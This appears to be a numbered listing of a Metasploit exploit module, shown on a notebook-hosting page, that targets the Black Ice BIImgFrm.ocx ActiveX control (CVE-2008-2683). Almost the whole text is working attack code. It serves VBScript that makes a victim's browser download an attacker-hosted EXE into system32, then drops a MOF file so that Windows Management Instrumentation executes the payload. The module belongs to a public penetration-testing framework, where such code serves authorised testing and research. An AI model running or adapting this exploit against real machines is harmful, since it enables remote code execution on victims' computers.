Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ExcellentRanking
8

9
  include Msf::Exploit::Remote::HttpServer::HTML
10
  include Msf::Exploit::EXE
11
  include Msf::Exploit::WbemExec
12

13
  #include Msf::Exploit::Remote::BrowserAutopwn
14
  #autopwn_info({
15
  #  :os_name => OperatingSystems::Match::WINDOWS,
16
  #  :ua_name    => HttpClients::IE,
17
  #  :javascript => true,
18
  #  :rank       => NormalRanking,
19
  #  :classid    => "{79956462-F148-497F-B247-DF35A095F80B}",
20
  #  :method     => "DownloadImageFileURL",
21
  #})
22

23
  def initialize(info = {})
24
    super(update_info(info,
25
      'Name'           => 'Black Ice Cover Page ActiveX Control Arbitrary File Download',
26
      'Description'    => %q{
27
          This module allows remote attackers to place arbitrary files on a users file system
28
        by abusing the "DownloadImageFileURL" method in the Black Ice BIImgFrm.ocx ActiveX
29
        Control (BIImgFrm.ocx 12.0.0.0).  Code execution can be achieved by first uploading the
30
        payload to the remote machine, and then upload another mof file, which enables Windows
31
        Management Instrumentation service to execute the binary. Please note that this module
32
        currently only works for Windows before Vista.  Also, a similar issue is reported in
33
        BIDIB.ocx (10.9.3.0) within the Barcode SDK.
34
      },
35
      'License'        => MSF_LICENSE,
36
      'Author'         =>
37
        [
38
          'shinnai',  # original discovery
39
          'mr_me <steventhomasseeley[at]gmail.com>',  # msf
40
          'sinn3r'    # wbemexec tekniq
41
        ],
42
      'References'     =>
43
        [
44
          [ 'CVE', '2008-2683'],
45
          [ 'OSVDB', '46007'],
46
          [ 'BID', '29577'],
47
          [ 'EDB', '5750' ],
48
        ],
49
      'DefaultOptions' =>
50
        {
51
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
52
        },
53
      'Payload'        =>
54
        {
55
          'Space'           => 2048,
56
          'StackAdjustment' => -3500,
57
        },
58
      'Platform'       => 'win',
59
      'Targets'        =>
60
        [
61
          #Windows before Vista
62
          [ 'Automatic', { } ],
63
        ],
64
      'DefaultTarget'  => 0,
65
      'DisclosureDate' => '2008-06-05'))
66
  end
67

68
  def autofilter
69
    false
70
  end
71

72
  def check_dependencies
73
    use_zlib
74
  end
75

76
  def on_request_uri(cli, request)
77

78
    if request.uri.match(/\.EXE/)
79
      print_status("Sending EXE payload...")
80
      send_response(cli, @payload, { 'Content-Type' => 'application/octet-stream' })
81
      return
82
    elsif request.uri.match(/\.MOF/)
83
      return if @mof_name == nil or @payload_name == nil
84
      print_status("Generating mof")
85
      mof = generate_mof(@mof_name, @payload_name)
86
      print_status("Sending MOF")
87
      send_response(cli, mof, {'Content-Type'=>'application/octet-stream'})
88
      return
89
    end
90

91
    url =  "http://"
92
    url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
93
    url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/"
94

95
    #VBScript variables
96
    clsid                 = "79956462-F148-497F-B247-DF35A095F80B"
97
    method                = "DownloadImageFileURL"
98
    blackice              = rand_text_alpha(rand(100) + 1)           #BlackIce object ID
99
    @payload_name         = rand_text_alpha(rand(10) + 1) + ".EXE"   #Payload name
100
    payload_vbs_url_name  = rand_text_alpha(5)                       #Payload's vbs var name
101
    payload_vbs_lpath     = rand_text_alpha(6)                       #Payload's lpath var name
102
    @mof_name             = rand_text_alpha(rand(10) + 1) + ".MOF"   #MOF path on victim machine
103
    mof_vbs_url_name      = rand_text_alpha(5)                       #MOF's vbs var name
104
    mof_vbs_lpath         = rand_text_alpha(6)                       #MOF's lpath var name
105
    sub_name              = rand_text_alpha(rand(10) + 1)            #Subroutine name
106

107
    #Slow connection friendly: We will wait for 4 seconds before we try to execute our payload
108
    #This delay seems necessary before calling mof, otherwise we end up interrupting downloading
109
    #our payload
110
    content = <<-EOS
111
    <html>
112
    <object classid='clsid:#{clsid}' id='#{blackice}' ></object>
113
    <script language='vbscript'>
114
    sub #{sub_name}
115
    #{mof_vbs_url_name} = "#{url}#{@mof_name}"
116
    #{mof_vbs_lpath} = "C:\\WINDOWS\\system32\\wbem\\mof\\#{@mof_name}"
117
    #{blackice}.#{method} #{mof_vbs_url_name}, #{mof_vbs_lpath}
118
    end sub
119

120
    #{payload_vbs_url_name} = "#{url}#{@payload_name}"
121
    #{payload_vbs_lpath} = "C:\\WINDOWS\\system32\\#{@payload_name}"
122
    #{blackice}.#{method} #{payload_vbs_url_name}, #{payload_vbs_lpath}
123
    setTimeout "#{sub_name}()", 4000
124
    </script>
125
    </html>
126
    EOS
127

128
    #Clear the extra tabs
129
    content = content.gsub(/^ {4}/, '')
130

131
    print_status("Sending exploit HTML")
132
    send_response_html(cli, content)
133
    handler(cli)
134

135
  end
136

137
  def exploit
138
    @payload = generate_payload_exe
139
    super
140
  end
141
end
142

143